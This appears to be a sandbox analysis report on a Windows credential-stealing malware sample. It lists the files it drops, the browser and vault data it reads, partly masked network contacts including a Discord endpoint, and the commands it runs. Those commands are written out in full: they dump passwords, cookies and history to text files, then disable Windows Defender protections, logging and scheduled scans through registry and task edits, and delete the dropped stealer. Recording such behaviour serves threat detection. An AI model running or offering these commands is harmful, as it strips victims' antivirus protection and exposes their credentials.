Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\microsoft update manager5160489.exe
- Windows Defender
- %APPDATA%\mozilla\firefox\profiles.ini
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %APPDATA%\opera software\opera stable\login data
- %TEMP%\config
- %TEMP%\costura.system.interactive.async.dll.compressed
- %TEMP%\costura.system.linq.async.dll.compressed
- %TEMP%\costura.system.memory.dll.compressed
- %TEMP%\costura.system.numerics.vectors.dll.compressed
- %TEMP%\costura.system.runtime.compilerservices.unsafe.dll.compressed
- %TEMP%\costura.system.threading.tasks.extensions.dll.compressed
- %TEMP%\costura.metadata
- %TEMP%\ss.png
- %TEMP%\costura.costura.dll.compressed
- %TEMP%\compile.bat
- %ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %ALLUSERSPROFILE%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %TEMP%\user_passwords.txt
- %TEMP%\cookies1
- %TEMP%\cookies3
- %TEMP%\cookies2
- %TEMP%\costura.system.collections.immutable.dll.compressed
- %TEMP%\costura.system.drawing.common.dll.compressed
- %TEMP%\costura.system.buffers.dll.compressed
- %TEMP%\costura.newtonsoft.json.dll.compressed
- %TEMP%\costura.netstandard.dll.compressed
- %TEMP%\rtkbtmanserv.exe
- %TEMP%\bfsvc.cfg
- %TEMP%\xwizard.cfg
- %TEMP%\bfsvc.exe
- %TEMP%\winhlp32.exe
- %TEMP%\hh.exe
- %TEMP%\splwow64.exe
- %TEMP%\xwizard.exe
- %TEMP%\user_cookies.txt
- %TEMP%\compile.vbs
- %TEMP%\snuvcdsm.exe
- %TEMP%\costura.discord webhook.dll.compressed
- %TEMP%\costura.discord.net.core.dll.compressed
- %TEMP%\costura.discord.net.rest.dll.compressed
- %TEMP%\costura.discord.net.webhook.dll.compressed
- %TEMP%\costura.dotnetzip.dll.compressed
- %TEMP%\costura.dotnetzip.pdb.compressed
- %TEMP%\costura.leaf.xnet.dll.compressed
- %TEMP%\costura.microsoft.bcl.asyncinterfaces.dll.compressed
- %TEMP%\whysosad
- %TEMP%\costura.costura.pdb.compressed
- %TEMP%\user_history.txt
- %TEMP%\ss.png
- %TEMP%\costura.dotnetzip.dll.compressed
- %TEMP%\costura.dotnetzip.pdb.compressed
- %TEMP%\costura.leaf.xnet.dll.compressed
- %TEMP%\costura.metadata
- %TEMP%\costura.microsoft.bcl.asyncinterfaces.dll.compressed
- %TEMP%\costura.netstandard.dll.compressed
- %TEMP%\costura.discord.net.rest.dll.compressed
- %TEMP%\costura.discord.net.webhook.dll.compressed
- %TEMP%\costura.newtonsoft.json.dll.compressed
- %TEMP%\costura.system.drawing.common.dll.compressed
- %TEMP%\costura.system.interactive.async.dll.compressed
- %TEMP%\costura.system.linq.async.dll.compressed
- %TEMP%\costura.system.memory.dll.compressed
- %TEMP%\costura.system.numerics.vectors.dll.compressed
- %TEMP%\costura.system.runtime.compilerservices.unsafe.dll.compressed
- %TEMP%\costura.system.buffers.dll.compressed
- %TEMP%\costura.system.collections.immutable.dll.compressed
- %TEMP%\costura.discord.net.core.dll.compressed
- %TEMP%\costura.discord webhook.dll.compressed
- %TEMP%\costura.costura.pdb.compressed
- %TEMP%\compile.vbs
- %TEMP%\cookies1
- %TEMP%\cookies2
- %TEMP%\cookies3
- %TEMP%\user_cookies.txt
- %TEMP%\user_history.txt
- %TEMP%\config
- %TEMP%\compile.bat
- %TEMP%\xwizard.exe
- %TEMP%\winhlp32.exe
- %TEMP%\snuvcdsm.exe
- %TEMP%\hh.exe
- %TEMP%\bfsvc.cfg
- %TEMP%\bfsvc.exe
- %TEMP%\xwizard.cfg
- %TEMP%\costura.costura.dll.compressed
- %TEMP%\splwow64.exe
- %TEMP%\costura.system.threading.tasks.extensions.dll.compressed
- %TEMP%\rtkbtmanserv.exe
- from %TEMP%\whysosad to %TEMP%\dav.bat
- %TEMP%\compile.bat
- %TEMP%\compile.vbs
- 'ap###.ipify.org':443
- 'microsoft.com':80
- 'di##ord.com':443
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- 'ap###.ipify.org':443
- 'di##ord.com':443
- DNS ASK it####lvehacker.gq
- DNS ASK ap###.ipify.org
- DNS ASK microsoft.com
- DNS ASK di##ord.com
- '%TEMP%\rtkbtmanserv.exe' ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs6UEGauYY2qrjFBD0Od2DTrS4e9JqPikv0pIW/XUIMLx/Lbt4rv48+8X6W+0Bd1rjoGR6JWcIBI2J/j2boutUDGytSMd/EXyzMbyRX6dJxPOI3avaUNnt4qtblKJaAoJLY=
- '<SYSTEM32>\wscript.exe' "%TEMP%\compile.vbs"
- '%TEMP%\bfsvc.exe' /capture /Filename "%TEMP%\capture.png"
- '%TEMP%\snuvcdsm.exe' /stext "%TEMP%\user_Passwords.txt"
- '%TEMP%\winhlp32.exe' /stext "%TEMP%\Cookies1"
- '%TEMP%\splwow64.exe' /stext "%TEMP%\Cookies2"
- '%TEMP%\hh.exe' /stext "%TEMP%\Cookies3"
- '%TEMP%\xwizard.exe' /stext "%TEMP%\user_History.txt"
- '<SYSTEM32>\cmd.exe' /C "%TEMP%\dav.bat"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c compile.bat' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del "%TEMP%\RtkBtManServ.exe"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C "%TEMP%\dav.bat"
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
- '<SYSTEM32>\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
- '<SYSTEM32>\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
- '<SYSTEM32>\reg.exe' delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
- '<SYSTEM32>\reg.exe' delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del "%TEMP%\RtkBtManServ.exe"
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\cmd.exe' /c compile.bat
- '<SYSTEM32>\wscript.exe' "%TEMP%\compile.vbs"
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
- '<SYSTEM32>\reg.exe' delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
- '<SYSTEM32>\choice.exe' /C Y /N /D Y /T 3